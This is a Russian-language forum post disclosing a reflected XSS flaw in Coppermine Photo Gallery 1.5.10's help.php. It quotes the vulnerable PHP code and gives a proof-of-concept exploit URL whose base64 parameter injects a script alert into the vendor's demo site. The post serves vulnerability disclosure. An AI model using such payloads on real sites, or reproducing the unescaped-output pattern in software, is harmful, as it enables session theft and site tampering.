Prev Предыдущее сообщение   Следующее сообщение Next
Старый 05.08.2010, 13:59   #1
asddas
 
Аватар для asddas
 
Регистрация: 04.08.2010
Сообщений: 153
Репутация: 161
По умолчанию Coppermine Photo Gallery

Продукт: Coppermine Photo Gallery 1.5 <= 1.5.10 Passive XSS
Офф сайт: coppermine-gallery.net
Зависимости: Нет
Уязвимые файлы: /help.php
Уязвимый кусок кода:
PHP код:
if ($base != '') {
    
// content of header and text have been base64-encoded - decode it now
    
$header = @unserialize(@base64_decode($header));


                . . . . . . . . . . .


if (
$header != '') {
    
$content '<h1>'.$header.'</h1>';
    
$content .= $text;
} else {
    
$content '';

Exploit:
http://coppermine-gallery.net/demo/cpg15x/help.php?base=1&h=czozMjoiPHNjcmlwdD5hbGVydCgnaGVo ZWhlJyk8L3NjcmlwdD4iOz==

Последний раз редактировалось asddas; 28.12.2010 в 23:32.. Причина: изменение заголовка
asddas вне форума   Ответить с цитированием
 

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot